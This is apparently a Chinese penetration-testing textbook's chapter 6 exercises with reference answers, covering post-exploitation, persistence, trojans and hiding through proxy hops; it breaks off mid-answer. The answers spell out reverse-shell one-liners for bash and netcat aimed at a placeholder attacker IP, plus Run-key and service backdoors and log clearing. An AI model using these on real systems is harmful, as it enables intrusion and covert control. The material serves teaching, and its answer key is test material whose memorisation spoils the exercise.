滲透測(cè)試技術(shù)-第六章習(xí)題及參考答案

第六章習(xí)題一、單項(xiàng)選擇題1．在進(jìn)行后滲透測(cè)試時(shí)，以下哪種操作不能幫助攻擊者維持對(duì)目標(biāo)系統(tǒng)的持久性控制？（）A．創(chuàng)建綁定Shell或反彈Shell B．創(chuàng)建調(diào)度任務(wù)C．執(zhí)行ARP掃描 D．創(chuàng)建新用戶2．以下哪種情況不適用于使用反彈Shell？（）A．目標(biāo)機(jī)器因防火墻受限，只能發(fā)送請(qǐng)求，不能接收請(qǐng)求B．目標(biāo)機(jī)器端口被占用C．目標(biāo)機(jī)器處于公共網(wǎng)絡(luò)，IP地址固定，攻擊機(jī)器可以直接連接D．對(duì)于病毒、木馬，受害者何時(shí)能“中招”、對(duì)方的網(wǎng)絡(luò)環(huán)境是什么樣的、什么時(shí)候開關(guān)機(jī)等情況都是未知的3．關(guān)于權(quán)限維持的描述，以下哪項(xiàng)是不正確的？（）A．權(quán)限維持是指攻擊者在成功入侵系統(tǒng)后，為了保持對(duì)該系統(tǒng)的持久訪問(wèn)能力，使用各種技術(shù)和工具，繞過(guò)系統(tǒng)的安全機(jī)制B．Windows的輔助功能鏡像劫持是通過(guò)使用Windows內(nèi)置的調(diào)試功能IFEO（ImageFileExecutionOptions）來(lái)實(shí)現(xiàn)的C．在Windows權(quán)限維持中，啟動(dòng)項(xiàng)/服務(wù)后門和系統(tǒng)計(jì)劃任務(wù)后門都需要攻擊者獲取系統(tǒng)管理員權(quán)限才能創(chuàng)建D．在Linux權(quán)限維持中，Crontab計(jì)劃任務(wù)后門是通過(guò)修改系統(tǒng)的/etc/crontab文件實(shí)現(xiàn)的4．以下哪種類型的木馬會(huì)模擬用戶點(diǎn)擊廣告等行為來(lái)獲取高額的廣告推廣費(fèi)用？（）A．網(wǎng)游木馬 B．網(wǎng)銀木馬 C．下載類木馬 D．網(wǎng)頁(yè)點(diǎn)擊類木馬5．根據(jù)本章內(nèi)容，下列敘述中錯(cuò)誤的是（）。A．在網(wǎng)絡(luò)攻擊后，攻擊者通常需要清除日志和操作記錄，以隱藏其入侵痕跡B．攻擊者常用的隱匿方式之一是“肉雞”和代理服務(wù)器混合組成的跳板鏈C．Socks5代理服務(wù)器僅能響應(yīng)HTTP通信協(xié)議，并過(guò)濾除80、8080等Web常用端口外的其他端口訪問(wèn)請(qǐng)求D．Tor是許多攻擊者用來(lái)隱藏自己的工具二、簡(jiǎn)答題1．請(qǐng)?jiān)敿?xì)解釋什么是后滲透，包括其目的、方法和在滲透測(cè)試中的重要性。說(shuō)明在進(jìn)行后滲透測(cè)試時(shí)，如何有效地隱藏攻擊行為，避免被系統(tǒng)管理員和安全設(shè)備檢測(cè)到。2．請(qǐng)?jiān)敿?xì)解釋反彈Shell的工作原理，以及在Linux和Windows系統(tǒng)下如何使用反彈Shell。3．簡(jiǎn)述Windows權(quán)限維持中啟動(dòng)項(xiàng)/服務(wù)后門的創(chuàng)建過(guò)程。4．請(qǐng)簡(jiǎn)述木馬的兩個(gè)主要部分，并說(shuō)明這兩部分是如何協(xié)同工作的。5．請(qǐng)簡(jiǎn)述網(wǎng)絡(luò)攻擊者是如何利用跳板來(lái)隱藏自己的行蹤的。參考答案一、單項(xiàng)選擇題C．執(zhí)行ARP掃描不能幫助攻擊者維持對(duì)目標(biāo)系統(tǒng)的持久性控制。C．目標(biāo)機(jī)器處于公共網(wǎng)絡(luò)，IP地址固定，攻擊機(jī)器可以直接連接的情況下，不適合使用反彈Shell。C．在Windows權(quán)限維持中，啟動(dòng)項(xiàng)/服務(wù)后門和系統(tǒng)計(jì)劃任務(wù)后門不一定需要系統(tǒng)管理員權(quán)限才能創(chuàng)建。D．網(wǎng)頁(yè)點(diǎn)擊類木馬會(huì)模擬用戶點(diǎn)擊廣告行為來(lái)獲取廣告推廣費(fèi)用。C．Socks5代理服務(wù)器不僅能響應(yīng)HTTP協(xié)議，還可以處理其他協(xié)議，不會(huì)過(guò)濾除80、8080等Web常用端口外的其他端口訪問(wèn)請(qǐng)求。二、簡(jiǎn)答題1.后滲透定義與目的：后滲透是指在成功入侵目標(biāo)系統(tǒng)后，攻擊者進(jìn)行進(jìn)一步操作的階段，包括權(quán)限提升、信息收集、持久性控制等，目的是擴(kuò)展控制、獲取更多敏感信息。方法：創(chuàng)建后門、調(diào)度任務(wù)、收集密碼等操作；使用憑證竊取、橫向移動(dòng)等手段訪問(wèn)更多系統(tǒng)資源。重要性：后滲透能夠進(jìn)一步加深攻擊效果，同時(shí)確保攻擊者可以長(zhǎng)期控制目標(biāo)系統(tǒng)，實(shí)現(xiàn)持久性。隱藏攻擊行為：隱藏文件、日志清除、使用代理或跳板、加密通信、偽裝為合法進(jìn)程或服務(wù)，繞過(guò)IDS/IPS等安全檢測(cè)工具，減少痕跡暴露。2.反彈Shell的工作原理原理：反彈Shell是指目標(biāo)主機(jī)主動(dòng)連接攻擊者的控制端，將其Shell或命令行環(huán)境反彈到控制端，適用于目標(biāo)主機(jī)無(wú)法接受外部連接的情況。在Linux系統(tǒng)中使用：通常通過(guò)bash-i>&/dev/tcp/攻擊者IP/端口0>&1實(shí)現(xiàn)，目標(biāo)主機(jī)的Shell會(huì)連接攻擊者監(jiān)聽(tīng)的端口。在Windows系統(tǒng)中使用：可利用nc.exe實(shí)現(xiàn)，命令如nc-ecmd.exe攻擊者IP端口，使得Windows目標(biāo)的cmd環(huán)境反彈到攻擊者控制端。3.Windows權(quán)限維持中啟動(dòng)項(xiàng)/服務(wù)后門的創(chuàng)建過(guò)程創(chuàng)建啟動(dòng)項(xiàng)后門：在注冊(cè)表的HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM\Software\Microsoft\Windows\CurrentVersion\Run中添加惡意程序路徑，使得系統(tǒng)啟動(dòng)時(shí)自動(dòng)執(zhí)行。創(chuàng)建服務(wù)后門：使用sccreate命令創(chuàng)建一個(gè)新的服務(wù)，將惡意程序作為服務(wù)添加到系統(tǒng)，服務(wù)啟動(dòng)時(shí)即可執(zhí)行惡意代碼。4.木馬的主要部分控制端：攻擊者端，用于發(fā)送指令、控制木馬操作。受控端（客戶端）：受害者系統(tǒng)中的木馬組件，負(fù)責(zé)接收控制端的指令，執(zhí)行相應(yīng)操作。協(xié)同工作方式：控制端通過(guò)網(wǎng)絡(luò)發(fā)送指令，受控端接收并執(zhí)行，如收集數(shù)據(jù)、遠(yuǎn)程控制。兩者通常通過(guò)加密連接保持隱蔽通信，避免被檢測(cè)。5.利用跳板隱藏行蹤跳板定義：攻擊者通過(guò)多個(gè)中間代理（跳板）進(jìn)行攻擊，每個(gè)跳板都是